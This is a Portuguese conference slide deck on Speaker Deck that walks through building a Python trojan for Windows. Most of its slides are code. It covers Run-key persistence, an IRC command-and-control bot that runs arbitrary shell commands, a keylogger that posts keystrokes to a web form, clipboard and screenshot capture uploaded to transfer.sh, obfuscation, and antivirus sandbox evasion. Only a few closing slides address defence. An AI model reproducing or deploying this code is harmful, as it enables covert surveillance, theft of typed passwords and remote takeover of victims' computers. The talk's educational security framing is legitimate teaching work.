Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Criando um malware com Python

yyyyyyyan
October 19, 2018
Programming
3
5.4k

Criando um malware com Python

Nos dias de hoje, segurança é um dos tópicos mais importantes em todo o universo da computação e, na verdade, do mundo no geral, envolvendo desde aspectos políticos, como no caso do vírus que afetou centrífugas iranianas, até o lado mais pessoal, como sua prima que teve a conta de uma rede social invadida e nunca entendeu como isso aconteceu. Mas como isso tudo funciona? Um simples malware é tão complicado assim de entender?

Nessa palestra, discutiremos um pouco sobre vírus de computador (leia-se malware) e como eles geralmente funcionam e afetam computadores pessoais. Aprenderemos técnicas e práticas de programação e computação que auxiliam esse tipo de programa e, com isso, construiremos nosso próprio malware em Python, com funcionalidades diversas de ataque, manutenção e defesa contra antivírus, dentre estas:

- Garantindo a execução repetida do malware

- Executando comandos no computador da vítima

- Captura de teclas (keylogger) e de tela

- Obtendo dados diversos da vítima

- Enganando a sandbox do antivírus

E mais, de acordo com o gosto do pessoal que estiver assistindo!

Saia da palestra como um novo hacker (ou melhor, especialista de segurança ;)) e abra caminhos para novas experiências na área de desenvolvimento.

yyyyyyyan

October 19, 2018
Tweet

More Decks by yyyyyyyan

See All by yyyyyyyan
como funcionam as senhas e por que não funcionam: tentando resolver um problema sem solução
yyyyyyyan
1
25
[PyCon APAC 2022] Writing secure code in Python
yyyyyyyan
1
150
Writing secure code in Python
yyyyyyyan
1
210
Escrevendo códigos seguros em Python
yyyyyyyan
2
330
Entendendo sockets no Python criando um bot de IRC
yyyyyyyan
1
380
Python 2 ou Python 3?
yyyyyyyan
1
120
Python 2 or Python 3? - (Finally) Understanding the differences between the two main versions of the language
yyyyyyyan
3
120
Creating a malware using Python
yyyyyyyan
1
490

Other Decks in Programming

See All in Programming
受け取る人から提供する人になるということ
little_rubyist
0
230
OSSで起業してもうすぐ10年 / Open Source Conference 2024 Shimane
furukawayasuto
0
100
Macとオーディオ再生 2024/11/02
yusukeito
0
370
Realtime API 入門
riofujimon
0
150
Amazon Qを使ってIaCを触ろう!
maruto
0
400
.NET のための通信フレームワーク MagicOnion 入門 / Introduction to MagicOnion
mayuki
1
1.5k
RubyLSPのマルチバイト文字対応
notfounds
0
120
聞き手から登壇者へ: RubyKaigi2024 LTでの初挑戦が 教えてくれた、可能性の星
mikik0
1
130
Contemporary Test Cases
maaretp
0
140
Jakarta EE meets AI
ivargrimstad
0
540
Flutterを言い訳にしない!アプリの使い心地改善テクニック5選🔥
kno3a87
1
170
Jakarta Concurrencyによる並行処理プログラミングの始め方 (JJUG CCC 2024 Fall)
tnagao7
1
290

Featured

See All Featured
Code Reviewing Like a Champion
maltzj
520
39k
Keith and Marios Guide to Fast Websites
keithpitt
409
22k
Designing Experiences People Love
moore
138
23k
Building Flexible Design Systems
yeseniaperezcruz
327
38k
The Art of Programming - Codeland 2020
erikaheidi
52
13k
Build The Right Thing And Hit Your Dates
maggiecrowley
33
2.4k
Happy Clients
brianwarren
98
6.7k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
StorybookのUI Testing Handbookを読んだ
zakiyama
27
5.3k
Practical Orchestrator
shlominoach
186
10k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k

Transcript

  1. Olá! Eu sou Yan Orestes Produtor de conteúdo na 1

    @yanorestes

  2. Entendendo o funcionamento de um malware usando Python 2

  3. O que é um malware? Vamos entender esse conceito 3

  4. Malware 4 malicious software software malicioso

  5. Não é só vírus! 5 Ransomware Vírus Worm Malware ...

  6. Qual escolher? 6 Destrutivo Útil X

  7. Cavalo de Troia Dando o máximo de possibilidades para o

    atacante através do Command & Control (C&C) 7

  8. Como? 8

  9. Como? Python 9

  10. Como? Python Por quê? 10

  11. Como? Python Por quê? Por que não? 11

  12. Vítima Windows (8) 12

  13. Um vírus ineficiente destrói seu portador. Um vírus esperto fica

    com ele. 13 - James Lovelock

  14. Garantindo a execução contínua do malware 14 1.

  15. Escondendo o malware em outros programas Fácil de programar Pouca

    efetividade 15

  16. Modificando o Registro do Windows 16 Efetivo Necessita privilégios de

    administrador

  17. Registro 17 Chaves Subchaves

  18. HKEY_LOCAL_MACHINE Run 18

  19. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run 19

  20. Como fazer isso no Python? 20

  21. Como fazer isso no Python? • winreg 21

  22. Como fazer isso no Python? • winreg • os 22

  23. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 23

  24. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 24

  25. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 25

  26. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 26

  27. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 27

  28. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 28

  29. Como estabelecer a comunicação entre atacante e vítima? 29

  30. Conectando a vítima ao atacante 30 2.

  31. Conexão direta entre atacante e vítima Maior controle Maior vulnerabilidade

    31

  32. Usando serviços externos (como Twitter) Fácil de programar Menos controle

    32

  33. Conectando através de uma rede IRC Maior controle Difícil de

    configurar 33

  34. IRC 34

  35. Como fazer isso no Python? 35

  36. Como fazer isso no Python? • socket 36

  37. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 37

  38. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 38 Só isso?

  39. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 39

  40. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 40

  41. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 41

  42. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 42

  43. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 43

  44. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 44

  45. 1. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = conexao.recebe_comando() 4. # tratar comando recebido Main Loop 45

  46. Como tomar o controle do computador da vítima? 46

  47. Executando comandos no computador da vítima 47 3.

  48. Usando os.system() Muita simplicidade Pouca flexibilidade 48

  49. Muita flexibilidade 49 Usando o módulo subprocess

  50. Usando o módulo subprocess Muita flexibilidade Quê? 50

  51. 51

  52. 52

  53. 53 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  54. 54 mas e a comunicação com o atacante? 1. from

    subprocess import run, PIPE, STDOUT 2. 3. def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  55. 55 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  56. 56 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  57. 57 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  58. 58 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  59. 59 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  60. 60 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  61. 61 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  62. 62 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  63. Capturando dados do usuário em tempo real 63 4.

  64. Capturando teclas digitadas (keylogger) 64

  65. Como fazer isso no Python? 65

  66. Como fazer isso no Python? • keyboard https://github.com/boppreh/keyboard 66

  67. Como fazer isso no Python? • keyboard • requests http://docs.python-requests.org/en/master

    / 67

  68. Como fazer isso no Python? • keyboard • requests •

    pyperclip https://github.com/asweigart/pyperclip 68

  69. 1. import keyboard 2. 3. teclas_apertadas = [] 4. keyboard.on_press(lambda

    k: teclas_apertadas.append(k.name)) 69

  70. Hello, world! 70 1. import keyboard 2. 3. teclas_apertadas =

    [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  71. Hello, world! shiftHello,spaceworldshift! 71 1. import keyboard 2. 3. teclas_apertadas

    = [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  72. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 72

  73. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 73

  74. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 74

  75. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 75

  76. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 76 e como o atacante acessa isso?

  77. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 77

  78. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 78

  79. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 79

  80. 80 1. from requests import post 2. 3. url_form =

    #linkParaForm# 4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado})

  81. Toque de ouro 81

  82. Toque de ouro 1. from pyperclip import paste 2. 3.

    def trata_copypaste(): 4. texto_copiado = paste() 5. teclas_apertadas.extend(list(texto_copiado)) 6. 7. keyboard.add_hotkey('ctrl+c', trata_copypaste) 82

  83. Capturando a tela da vítima 83

  84. Como fazer isso no Python? 84

  85. Como fazer isso no Python? • pyscreenshot https://github.com/ponty/pyscreensho t 85

  86. Como fazer isso no Python? • pyscreenshot • os 86

  87. Como fazer isso no Python? • pyscreenshot • os •

    requests 87

  88. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 88

  89. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 89

  90. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 90 e como o atacante acessa isso?

  91. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 91

  92. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 92

  93. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def tira_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. resposta = r.text if r.status_code == 200 else 'Erro no upload' 10. return resposta 11. remove(filename) 93

  94. Extra! 94

  95. Ofuscação de código 95 5.

  96. Compilar para bytecode Fácil Facilmente recuperável 96

  97. Usando pyminifier Divertido Recuperável 97

  98. 98 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py

  99. 99 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py

  100. 100 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

  101. 101 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o nivel4.py malware.py

  102. Escalonamento de privilégios 102 6.

  103. Escalonamento de privilégios 103 6. • Brute force

  104. Escalonamento de privilégios 104 6. • Brute force • Injeção

    de código

  105. 105 E como o usuário pode se proteger?

  106. Precaução 106

  107. Controle das conexões 107

  108. Antivírus? 108

  109. 109 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo

  110. 110 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo Será?

  111. Antivírus são insuportáveis 111

  112. Antivírus são insuportáveis 112 Taxas de renovação inesperadas

  113. Antivírus são insuportáveis 113 Taxas de renovação inesperadas Problemas com

    o sistema

  114. Antivírus são insuportáveis 114 Taxas de renovação inesperadas Problemas com

    o sistema aaaaaaaaaaaaaaaaaaaaaaaaa

  115. 2010 - Caso McAfee 115

  116. 2010 - Caso McAfee 116 2011 - Caso MSE

  117. 2010 - Caso McAfee 117 2011 - Caso MSE 2012

    - Caso Sophos

  118. Efetividade baixa 118 2006 - 40-50% 2007 - 20-30%

  119. Efetividade baixa? 119 2006 - 40-50% 2007 - 20-30% 2013

    - 91.1-99.9%

  120. 120 Humanos falham

  121. A não ser que você... 121 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet

  122. A não ser que você... 122 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet • Não utilize um sistema operacional

  123. Proteção contra antivírus 123 7. •

  124. Proteção contra antivírus 124 7. • Assinatura => Código polimórfico

  125. Proteção contra antivírus 125 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) https://github.com/boppreh/mouse/

  126. Proteção contra antivírus 126 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) • Método heurístico => ?

  127. Muito obrigado! Alguma pergunta? Você pode falar comigo em ▪

    @yanorestes ▪ [email protected] 127 https://speakerdeck.com/yanorestes/criando-um-malware-com-python

  128. Agradecimentos especiais ▪ Python Brasil ▪ Roosevelt Fujikawa ([email protected]) ▪

    Alura/Caelum ▪ Casa do Código (PythonBrasil&CasadoCodigo) 128 15%

  129. Design da apresentação Essa apresentação usa as seguintes fontes: ▪

    Títulos: Work sans bold ▪ Corpo: Work sans light ▪ Código: Arial com formatação do tohtml.com Você pode baixar as fontes nessa página https://github.com/weiweihuanghuang/Work-Sans/tree/master/fonts/desktop 129 Layout dos slides e ícones por SlidesCarnival